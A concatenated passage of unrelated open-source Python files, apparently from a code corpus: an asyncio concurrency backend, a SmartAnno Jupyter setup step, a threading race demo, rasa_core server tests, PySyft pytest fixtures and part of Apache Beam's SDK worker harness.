return await self.acquire_on_behalf_of(current_task())
async def acquire_on_behalf_of(self, borrower) -> None:
try:
await self.acquire_on_behalf_of_nowait(borrower)
except WouldBlock:
event = asyncio.Event()
self._wait_queue[borrower] = event
try:
await event.wait()
except BaseException:
self._wait_queue.pop(borrower, None)
raise
self._borrowers.add(borrower)
async def release(self) -> None:
await self.release_on_behalf_of(current_task())
async def release_on_behalf_of(self, borrower) -> None:
try:
self._borrowers.remove(borrower)
except KeyError:
raise RuntimeError("this borrower isn't holding any of this CapacityLimiter's "
"tokens") from None
# Notify the next task in line if this limiter has free capacity now
if self._wait_queue and len(self._borrowers) < self._total_tokens:
event = self._wait_queue.popitem()[1]
event.set()
def current_default_thread_limiter():
return _default_thread_limiter
_default_thread_limiter = CapacityLimiter(40)
#
# Operating system signals
#
@asynccontextmanager
async def open_signal_receiver(*signals: int):
async def process_signal_queue():
while True:
signum = await queue.get()
yield signum
loop = get_running_loop()
queue = asyncio.Queue() # type: asyncio.Queue[int]
handled_signals = set()
agen = process_signal_queue()
try:
for sig in set(signals):
loop.add_signal_handler(sig, queue.put_nowait, sig)
handled_signals.add(sig)
yield agen
finally:
await agen.aclose()
for sig in handled_signals:
loop.remove_signal_handler(sig)
#
# Testing and debugging
#
def _create_task_info(task: asyncio.Task) -> TaskInfo:
task_state = _task_states.get(task)
if task_state is None:
name = task.get_name() if _native_task_names else None # type: ignore
parent_id = None
else:
name = task_state.name
parent_id = task_state.parent_id
return TaskInfo(id(task), parent_id, name, task._coro) # type: ignore
async def get_current_task() -> TaskInfo:
return _create_task_info(current_task()) # type: ignore
async def get_running_tasks() -> List[TaskInfo]:
return [_create_task_info(task) for task in all_tasks() if not task.done()]
async def wait_all_tasks_blocked() -> None:
this_task = current_task()
while True:
for task in all_tasks():
if task is this_task:
continue
if isgenerator(task._coro): # type: ignore
awaitable = task._coro.gi_yieldfrom # type: ignore
else:
awaitable = task._coro.cr_await # type: ignore
# If the first awaitable is None, the task has not started running yet
task_running = bool(awaitable)
# Consider any task doing sleep(0) as not being blocked
while asyncio.iscoroutine(awaitable):
if isgenerator(awaitable):
code = awaitable.gi_code
f_locals = awaitable.gi_frame.f_locals
awaitable = awaitable.gi_yieldfrom
else:
code = awaitable.cr_code
f_locals = awaitable.cr_frame.f_locals
awaitable = awaitable.cr_await
if code is asyncio.sleep.__code__ and f_locals['delay'] == 0:
task_running = False
break
if not task_running:
await sleep(0.1)
break
else:
return
class TestRunner(abc.TestRunner):
def __init__(self, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None):
_maybe_set_event_loop_policy(policy, use_uvloop)
self._loop = asyncio.new_event_loop()
self._loop.set_debug(debug)
asyncio.set_event_loop(self._loop)
def _cancel_all_tasks(self):
to_cancel = all_tasks(self._loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
self._loop.run_until_complete(
asyncio.gather(*to_cancel, loop=self._loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
raise task.exception()
def close(self) -> None:
try:
self._cancel_all_tasks()
self._loop.run_until_complete(self._loop.shutdown_asyncgens())
finally:
asyncio.set_event_loop(None)
self._loop.close()
def call(self, func: Callable[..., Awaitable], *args, **kwargs):
return self._loop.run_until_complete(func(*args, **kwargs))
|
IntroStep.py | from threading import Thread
from IPython.core.display import clear_output, display
from ipywidgets import widgets
from SmartAnno.utils.ConfigReader import ConfigReader
from SmartAnno.gui.BranchingWidgets import BranchingStep
from SmartAnno.models.GloveModel import GloveModel
class IntroStep(BranchingStep):
def __init__(self, description='', name=None):
self.glove_path = ConfigReader.getValue('glove/model_path')
self.glove_vocab = ConfigReader.getValue('glove/vocab')
self.glove_vector = ConfigReader.getValue('glove/vector')
# widgets to take the user inputs
self.glove_path_input = None
self.glove_vocab_input = None
self.glove_vector_input = None
self.api_key_input = None
if self.glove_vocab is None:
self.glove_vocab = 1900000
if self.glove_vector is None:
self.glove_vector = 300
self.html = widgets.HTML(value=description)
super().__init__(name)
pass
def start(self):
self.branch_buttons = [widgets.Button(description=d, layout=widgets.Layout(width='150px', left='100px')) for d
in
['StartOver', 'ContinueReviewing']]
clear_output()
self.box = self.createBox()
display(self.box)
pass
def navigate(self, button):
if self.glove_path_input is not None:
self.saveGloveConfig()
if self.api_key_input is not None:
self.saveAPIKey()
else:
self.workflow.api_key = ConfigReader.getValue("api_key")
self.backgroundWork()
if button.description == 'ContinueReviewing':
self.workflow.to_continue = True
self.workflow.steps[1].start()
self.workflow.steps[1].complete()
else:
self.workflow.to_continue = False
self.workflow.steps[1].start()
pass
def complete(self):
self.navigate(self.branch_buttons[0])
pass
def saveGloveConfig(self):
self.glove_path = self.glove_path_input.value
self.glove_vocab = self.glove_vocab_input.value
self.glove_vector = self.glove_vector_input.value
self.workflow.glove_path = self.glove_path
ConfigReader.setValue("glove/vocab", int(self.glove_vocab))
ConfigReader.setValue("glove/vector", int(self.glove_vector))
ConfigReader.setValue("glove/model_path", self.glove_path)
ConfigReader.saveConfig()
pass
def saveAPIKey(self):
ConfigReader.setValue("api_key", self.api_key_input.value)
ConfigReader.saveConfig()
self.workflow.api_key = self.api_key_input.value
pass
def createBox(self):
rows = self.addSeparator()
rows += [self.html]
self.requestWELocation(rows)
self.requestUMLSAPIKey(rows)
rows += self.addSeparator() + self.addConditions()
# print('\n'.join([str(row) for row in rows]))
vbox = widgets.VBox(rows, layout=widgets.Layout(display='flex', flex_grown='column'))
return vbox
def addConditions(self):
for button in self.branch_buttons:
button.on_click(self.navigate)
return [widgets.HBox(self.branch_buttons, layout=widgets.Layout(left='10%', width='80%'))]
def backgroundWork(self):
thread_gm = Thread(target=self.prepareGloveModel)
thread_gm.start()
pass
def prepareGloveModel(self):
GloveModel(word2vec_file=self.glove_path, vocab=self.glove_vocab, vect=self.glove_vector)
pass
def requestWELocation(self, rows):
if self.glove_path is None or len(self.glove_path.strip()) == 0:
rows += self.addSeparator()
rows.append(
widgets.HTML(value='<h4>Set up your Glove model</h4><p>In order to use word embedding, you need '
'to tell where the glove model locates:</p><p>If you have not downloaded yet,'
'you can download it from <a href="https://nlp.stanford.edu/projects/glove/" '
' target="_blank">Glove Site</a><p>. Once you download it, you need to unzip it'
' and copy the unzipped file path here. SmartAnno will automatically convert it '
'into binary format (will be loaded faster). If you do not set it up, the word '
'embedding synonym extender will be <b>skipped</b>.</p>'))
self.glove_path_input = widgets.Text(
value='',
placeholder='copy and paste your glove model file location here',
description='',
disabled=False,
layout=widgets.Layout(width='70%')
)
self.glove_vocab_input = widgets.Text(value=str(self.glove_vocab),
placeholder='',
description='', disabled=False)
self.glove_vector_input = widgets.Text(value=str(self.glove_vector),
placeholder='the vector size of the glove model',
description='', disabled=False)
rows.append(self.glove_path_input)
rows.append(widgets.HTML(value='The vocabulary size of the glove model:'))
rows.append(self.glove_vocab_input)
rows.append(widgets.HTML(value='The vector size of the glove model:'))
rows.append(self.glove_vector_input)
rows += self.addSeparator()
pass
def requestUMLSAPIKey(self, rows):
api_key = ConfigReader.getValue("api_key")
if api_key is None or len(api_key) == 0:
rows.append(
widgets.HTML(
value='<h4>Set your API Key</h4><p>In order to use the UMLS synonym checking module, you need to set'
' up your API key: (<a href="https://www.nlm.nih.gov/research/umls/user_education/quick_tours/'
'UTS-API/UTS_REST_API_Authentication.html" target="_blank">How to get your API Key_at 01:12 from'
' beginning. </a>)</p><p>If you do not set the api key, the UMLS synonym extender will be '
'<b>skipped</b>.</p>'))
self.api_key_input = widgets.Text(value='',
placeholder='',
description='', disabled=False)
rows.append(self.api_key_input)
rows += self.addSeparator()
|
basic.py | import threading as th
lock=th.Lock()
x=0
def a():
global x
for i in range(10000):
x-=2
print(x)
def b():
global x
for i in range(10000):
x+=2
print(x)
def c():
global x
for i in range(10000):
x-=3
print(x)
def d():
global x
for i in range(10000):
x+=3
print(x)
l=[a,b,c,d]
for i in l:
t=th.Thread(target=i)
t.start()
print(x)
'''
output1:
-20000
0-30000
00
output2:
15000
-30000
0
0
output3:
-20000
0
-30000
0
0
'''
|
test_server.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import os
import signal
import uuid
from multiprocessing import Process
import pytest
from builtins import str
from freezegun import freeze_time
import rasa_core
from rasa_core import server, events
from rasa_core.actions.action import ACTION_LISTEN_NAME
from rasa_core.agent import Agent
from rasa_core.channels import UserMessage
from rasa_core.channels.direct import CollectingOutputChannel
from rasa_core.events import (
UserUttered, BotUttered, SlotSet, TopicSet, Event, ActionExecuted)
from rasa_core.interpreter import RegexInterpreter
from rasa_core.policies.augmented_memoization import \
AugmentedMemoizationPolicy
from rasa_core.remote import RasaCoreClient, RemoteAgent
from tests.conftest import DEFAULT_STORIES_FILE
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters({"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {
"confidence": 1.0, "name": "greet"},
"entities": []}
}),
BotUttered("Welcome!", {"test": True}),
TopicSet("question"),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
@pytest.fixture(scope="module")
def http_app(core_server):
p = Process(target=core_server.run, args=("0.0.0.0", 1234))
p.daemon = True
p.start()
yield "http://0.0.0.0:1234"
os.kill(p.ident, signal.SIGKILL)
p.join()
@pytest.fixture(scope="module")
def core_server(tmpdir_factory):
model_path = tmpdir_factory.mktemp("model").strpath
agent = Agent("data/test_domains/default_with_topic.yml",
policies=[AugmentedMemoizationPolicy(max_history=3)])
training_data = agent.load_data(DEFAULT_STORIES_FILE)
agent.train(training_data)
agent.persist(model_path)
return server.create_app(model_path,
interpreter=RegexInterpreter())
@pytest.fixture(scope="module")
def app(core_server):
return core_server.test_client()
def test_root(app):
response = app.get("http://dummy/")
content = response.get_data(as_text=True)
assert response.status_code == 200 and content.startswith("hello")
def test_version(app):
response = app.get("http://dummy/version")
content = response.get_json()
assert response.status_code == 200
assert content.get("version") == rasa_core.__version__
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(app):
response = app.get("http://dummy/conversations/madeupid/tracker")
content = response.get_json()
assert response.status_code == 200
assert content["paused"] is False
assert content["slots"] == {"location": None, "cuisine": None}
assert content["sender_id"] == "madeupid"
assert content["events"] == [{"event": "action",
"name": "action_listen",
"timestamp": 1514764800}]
assert content["latest_message"] == {"text": None,
"intent": {},
"entities": []}
def test_continue_on_non_existent_conversation(app):
data = json.dumps({"events": [], "executed_action": None})
response = app.post("http://dummy/conversations/myid/continue",
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
assert content["next_action"] == "action_listen"
assert content["tracker"]["events"] is None
assert content["tracker"]["paused"] is False
assert content["tracker"]["sender_id"] == "myid"
assert content["tracker"]["slots"] == {"location": None, "cuisine": None}
assert content["tracker"]["latest_message"] == {"text": None,
"intent": {},
"entities": []}
def test_parse(app):
data = json.dumps({"query": "/greet"})
response = app.post("http://dummy/conversations/myid/parse",
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
assert content["next_action"] == "utter_greet"
assert content["tracker"]["events"] is None
assert content["tracker"]["paused"] is False
assert content["tracker"]["sender_id"] == "myid"
assert content["tracker"]["slots"] == {"location": None, "cuisine": None}
assert content["tracker"]["latest_message"]["text"] == "/greet"
assert content["tracker"]["latest_message"]["intent"] == {
"confidence": 1.0,
"name": "greet"}
def test_continue(app):
data = json.dumps({"query": "/greet"})
response = app.post("http://dummy/conversations/myid/parse",
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
data = json.dumps({"events": [], "executed_action": "utter_greet"})
response = app.post("http://dummy/conversations/myid/continue",
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
assert content["next_action"] == "action_listen"
assert content["tracker"]["events"] is None
assert content["tracker"]["paused"] is False
assert content["tracker"]["sender_id"] == "myid"
assert content["tracker"]["slots"] == {"location": None, "cuisine": None}
assert content["tracker"]["latest_message"]["text"] == "/greet"
assert content["tracker"]["latest_message"]["intent"] == {
"confidence": 1.0,
"name": "greet"}
@pytest.mark.parametrize("event", test_events)
def test_pushing_events(app, event):
cid = str(uuid.uuid1())
conversation = "http://dummy/conversations/{}".format(cid)
data = json.dumps({"query": "/greet"})
response = app.post("{}/parse".format(conversation),
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
data = json.dumps({"events": [], "executed_action": "utter_greet"})
response = app.post("{}/continue".format(conversation),
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
data = json.dumps([event.as_dict()])
response = app.post("{}/tracker/events".format(conversation),
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
tracker_response = app.get("http://dummy/conversations/{}/tracker"
"".format(cid))
tracker = tracker_response.get_json()
assert tracker is not None
assert len(tracker.get("events")) == 5
evt = tracker.get("events")[4]
assert Event.from_parameters(evt) == event
def test_put_tracker(app):
data = json.dumps([event.as_dict() for event in test_events])
response = app.put("http://dummy/conversations/pushtracker/tracker",
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
tracker_response = app.get("http://dummy/conversations/pushtracker/tracker")
tracker = tracker_response.get_json()
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
def test_list_conversations(app):
data = json.dumps({"query": "/greet"})
response = app.post("http://dummy/conversations/myid/parse",
data=data, content_type='application/json')
content = response.get_json()
assert response.status_code == 200
response = app.get("http://dummy/conversations")
content = response.get_json()
assert response.status_code == 200
assert len(content) > 0
assert "myid" in content
def test_remote_client(http_app, default_agent, tmpdir):
model_path = tmpdir.join("persisted_model").strpath
default_agent.persist(model_path)
remote_agent = RemoteAgent.load(model_path,
http_app)
message = UserMessage("""/greet{"name":"Rasa"}""",
output_channel=CollectingOutputChannel())
remote_agent.process_message(message)
tracker = remote_agent.core_client.tracker_json("default")
assert len(tracker.get("events")) == 6
# listen
assert tracker["events"][0]["name"] == "action_listen"
# this should be the utterance
assert tracker["events"][1]["text"] == """/greet{"name":"Rasa"}"""
# set slot event
assert tracker["events"][2]["value"] == "Rasa"
# utter action
assert tracker["events"][3]["name"] == "utter_greet"
# this should be the bot utterance
assert tracker["events"][4]["text"] == "hey there Rasa!"
# listen
assert tracker["events"][5]["name"] == "action_listen"
def test_remote_status(http_app):
client = RasaCoreClient(http_app, None)
status = client.status()
assert status.get("version") == rasa_core.__version__
def test_remote_clients(http_app):
client = RasaCoreClient(http_app, None)
cid = str(uuid.uuid1())
client.parse("/greet", cid)
clients = client.clients()
assert cid in clients
def test_remote_append_events(http_app):
client = RasaCoreClient(http_app, None)
cid = str(uuid.uuid1())
client.append_events_to_tracker(cid, test_events[:2])
tracker = client.tracker_json(cid)
evts = tracker.get("events")
expected = [ActionExecuted(ACTION_LISTEN_NAME)] + test_events[:2]
assert events.deserialise_events(evts) == expected
|
conftest.py | import builtins
from multiprocessing import Process
import sys
import time
import pytest
import torch
import syft
from syft import TorchHook
from syft.workers import WebsocketClientWorker
from syft.workers import WebsocketServerWorker
def _start_proc(participant, dataset: str = None, **kwargs): # pragma: no cover
"""Helper function for spinning up a websocket participant."""
def target():
server = participant(**kwargs)
if dataset is not None:
data, key = dataset
server.add_dataset(data, key=key)
server.start()
p = Process(target=target)
p.start()
return p
def instantiate_websocket_client_worker(max_tries=5, sleep_time=0.1, **kwargs): # pragma: no cover
"""Helper function to instantiate the websocket client.
If a connection is refused, we wait a bit (`sleep_time` seconds) and try again.
After `max_tries` failed tries, a ConnectionRefusedError is raised.
"""
retry_counter = 0
connection_open = False
while not connection_open:
try:
remote_proxy = WebsocketClientWorker(**kwargs)
connection_open = True
except ConnectionRefusedError as e:
if retry_counter < max_tries:
retry_counter += 1
time.sleep(sleep_time)
else:
raise e
return remote_proxy
@pytest.fixture()
def start_proc(): # pragma: no cover
return _start_proc
@pytest.fixture()
def start_remote_worker(): # pragma: no cover
"""Helper function for starting a websocket worker."""
def _start_remote_worker(
id, hook, dataset: str = None, host="localhost", port=8768, max_tries=5, sleep_time=0.01
):
kwargs = {"id": id, "host": host, "port": port, "hook": hook}
server = _start_proc(WebsocketServerWorker, dataset=dataset, **kwargs)
remote_proxy = instantiate_websocket_client_worker(
max_tries=max_tries, sleep_time=sleep_time, **kwargs
)
return server, remote_proxy
return _start_remote_worker
@pytest.fixture(scope="session", autouse=True)
def hook():
hook = TorchHook(torch)
return hook
@pytest.fixture(scope="function", autouse=True)
def workers(hook):
# To run a plan locally the local worker can't be a client worker,
# since it needs to register objects
# LaRiffle edit: doing this increases the reference count on pointers and
# breaks the auto garbage collection for pointer of pointers, see #2150
# hook.local_worker.is_client_worker = False
# Reset the hook and the local worker
syft.local_worker.clear_objects()
syft.frameworks.torch.hook.hook_args.hook_method_args_functions = {}
syft.frameworks.torch.hook.hook_args.hook_method_response_functions = {}
syft.frameworks.torch.hook.hook_args.get_tensor_type_functions = {}
# Define 4 virtual workers
alice = syft.VirtualWorker(id="alice", hook=hook, is_client_worker=False)
bob = syft.VirtualWorker(id="bob", hook=hook, is_client_worker=False)
charlie = syft.VirtualWorker(id="charlie", hook=hook, is_client_worker=False)
james = syft.VirtualWorker(id="james", hook=hook, is_client_worker=False)
workers = {
"me": hook.local_worker,
"alice": alice,
"bob": bob,
"charlie": charlie,
"james": james,
}
yield workers
alice.remove_worker_from_local_worker_registry()
bob.remove_worker_from_local_worker_registry()
charlie.remove_worker_from_local_worker_registry()
james.remove_worker_from_local_worker_registry()
@pytest.fixture
def hide_module():
import_orig = builtins.__import__
# When we check for imports in dependency_check, we don't actually attempt
# to import each package, so popping a module from sys.modules and mocking
# the import statement is not sufficient to simulate the dependency check
# for when the dependency is absent. The way we check for dependencies
# (importlib.util.find_spec) uses module Finders in the sys.meta_path when
# checking for module specs, so we need to mock the find_spec method of the
# Finder that will discover the module we want to hide. That Finder happens
# to be in position three of the meta path.
find_spec_orig = sys.meta_path[3].find_spec
def mocked_import(name, globals, locals, fromlist, level):
if name in ["tensorflow", "tf_encrypted", "torch"]:
raise ImportError()
return import_orig(name, globals, locals, fromlist, level)
def mocked_find_spec(self, fullname, target=None):
if self in ["tensorflow", "tf_encrypted"]:
return None
return find_spec_orig(self, fullname, target)
builtins.__import__ = mocked_import
sys.meta_path[3].find_spec = mocked_find_spec
yield
builtins.__import__ = import_orig
sys.meta_path[3].find_spec = find_spec_orig
|
sdk_worker.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes
def __init__(
self, control_address, worker_count, credentials=None, worker_id=None,
profiler_factory=None):
self._alive = True
self._worker_count = worker_count
self._worker_index = 0
self._worker_id = worker_id
if credentials is None:
logging.info('Creating insecure control channel for %s.', control_address)
self._control_channel = grpc.insecure_channel(control_address)
else:
logging.info('Creating secure control channel for %s.', control_address)
self._control_channel = grpc.secure_channel(control_address, credentials)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
logging.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials)
self._state_handler_factory = GrpcStateHandlerFactory()
self._profiler_factory = profiler_factory
self.workers = queue.Queue()
# one thread is enough for getting the progress report.
# Assumption:
# Progress report generation should not do IO or wait on other resources.
# Without wait, having multiple threads will not improve performance and
# will only add complexity.
self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
self._process_thread_pool = futures.ThreadPoolExecutor(
max_workers=self._worker_count)
self._instruction_id_vs_worker = {}
self._fns = {}
self._responses = queue.Queue()
self._process_bundle_queue = queue.Queue()
self._unscheduled_process_bundle = {}
logging.info('Initializing SDKHarness with %s workers.', self._worker_count)
def run(self):
control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
no_more_work = object()
# Create workers
for _ in range(self._worker_count):
# SdkHarness manage function registration and share self._fns with all
# the workers. This is needed because function registration (register)
# and exceution(process_bundle) are send over different request and we
# do not really know which woker is going to process bundle
# for a function till we get process_bundle request. Moreover
# same function is reused by different process bundle calls and
# potentially get executed by different worker. Hence we need a
# centralized function list shared among all the workers.
self.workers.put(
SdkWorker(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns,
profiler_factory=self._profiler_factory))
def get_responses():
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
monitoring_thread = threading.Thread(target=self._monitor_process_bundle)
monitoring_thread.daemon = True
monitoring_thread.start()
try:
for work_request in control_stub.Control(get_responses()):
logging.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
logging.info('No more requests from control plane')
logging.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._progress_thread_pool.shutdown()
self._process_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
logging.info('Done consuming work.')
def _execute(self, task, request):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
logging.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id, traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
def task():
for process_bundle_descriptor in getattr(
request, request.WhichOneof('request')).process_bundle_descriptor:
self._fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
self._execute(task, request)
def _request_process_bundle(self, request):
def task():
# Take the free worker. Wait till a worker is free.
worker = self.workers.get()
# Get the first work item in the queue
work = self._process_bundle_queue.get()
# add the instuction_id vs worker map for progress reporting lookup
self._instruction_id_vs_worker[work.instruction_id] = worker
self._unscheduled_process_bundle.pop(work.instruction_id, None)
try:
self._execute(lambda: worker.do_instruction(work), work)
finally:
# Delete the instruction_id <-> worker mapping
self._instruction_id_vs_worker.pop(work.instruction_id, None)
# Put the worker back in the free worker pool
self.workers.put(worker)
# Create a task for each process_bundle request and schedule it
self._process_bundle_queue.put(request)
self._unscheduled_process_bundle[request.instruction_id] = time.time()
self._process_thread_pool.submit(task)
logging.debug(
"Currently using %s threads." % len(self._process_thread_pool._threads))
def _request_process_bundle_progress(self, request):
def task():
instruction_reference = getattr(
request, request.WhichOneof('request')).instruction_reference
if instruction_reference in self._instruction_id_vs_worker:
self._execute(
lambda: self._instruction_id_vs_worker[
instruction_reference
].do_instruction(request), request)
else:
self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=(
'Process bundle request not yet scheduled for instruction {}' if
instruction_reference in self._unscheduled_process_bundle else
'Unknown process bundle instruction {}').format(
instruction_reference)), request)
self._progress_thread_pool.submit(task)
def _monitor_process_bundle(self):
"""
Monitor the unscheduled bundles and log if a bundle is not scheduled for
more than SCHEDULING_DELAY_THRESHOLD_SEC.
"""
while self._alive:
time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
# Check for bundles to be scheduled.
if self._unscheduled_process_bundle:
current_time = time.time()
for instruction_id in self._unscheduled_process_bundle:
request_time = None
try:
request_time = self._unscheduled_process_bundle[instruction_id]
except KeyError:
pass
if request_time:
scheduling_delay = current_time - request_time
if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
logging.warn('Unable to schedule instruction %s for %s',
instruction_id, scheduling_delay)
class SdkWorker(object):
def __init__(self, state_handler_factory, data_channel_factory, fns,
profiler_factory=None):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {}
self.cached_bundle_processors = collections.defaultdict(list)
self.profiler_factory = profiler_factory
def do_instruction(self, request):
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(getattr(request, request_type),
request.instruction_id)
else:
raise NotImplementedError
def register(self, request, instruction_id):
for process_bundle_descriptor in request.process_bundle_descriptor:
self.fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self, request, instruction_id):
with self.get_bundle_processor(
instruction_id,
request.process_bundle_descriptor_reference) as bundle_processor:
with self.maybe_profile(instruction_id):
bundle_processor.process_bundle(instruction_id)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
metrics=bundle_processor.metrics(),
monitoring_infos=bundle_processor.monitoring_infos()))
@contextlib.contextmanager
def get_bundle_processor(self, instruction_id, bundle_descriptor_id):
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
state_handler = processor.state_handler
except IndexError:
process_bundle_desc = self.fns[bundle_descriptor_id]
state_handler = self.state_handler_factory.create_state_handler(
process_bundle_desc.state_api_service_descriptor)
processor = bundle_processor.BundleProcessor(
process_bundle_desc,
state_handler,
self.data_channel_factory)
try:
self.active_bundle_processors[instruction_id] = processor
with state_handler.process_instruction_id(instruction_id):
yield processor
finally:
del self.active_bundle_processors[instruction_id]
# Outside the finally block as we only want to re-use on success.
processor.reset()
self.cached_bundle_processors[bundle_descriptor_id].append(processor)
def process_bundle_progress(self, request, instruction_id):
# It is an error to get progress for a not-in-flight bundle.
processor = self.active_bundle_processors.get(request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
metrics=processor.metrics() if processor else None,
monitoring_infos=processor.monitoring_infos() if processor else []))
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self):
self._state_handler_cache = {}
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
def create_state_handler(self, api_service_descriptor):
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
logging.info('Creating insecure state channel for %s', url)
grpc_channel = grpc.insecure_channel(
url,
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options=[("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)])
logging.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._state_handler_cache[url] = GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
return self._state_handler_cache[url]
def close(self):
logging.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
class ThrowingStateHandler(object):
"""A state handler that errors on any requests."""
def blocking_get(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_append(self, state_key, data, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_clear(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
class GrpcStateHandler(object):
_DONE = object()
def __init__(self, state_stub):
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue()
self._responses_by_id = {}
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
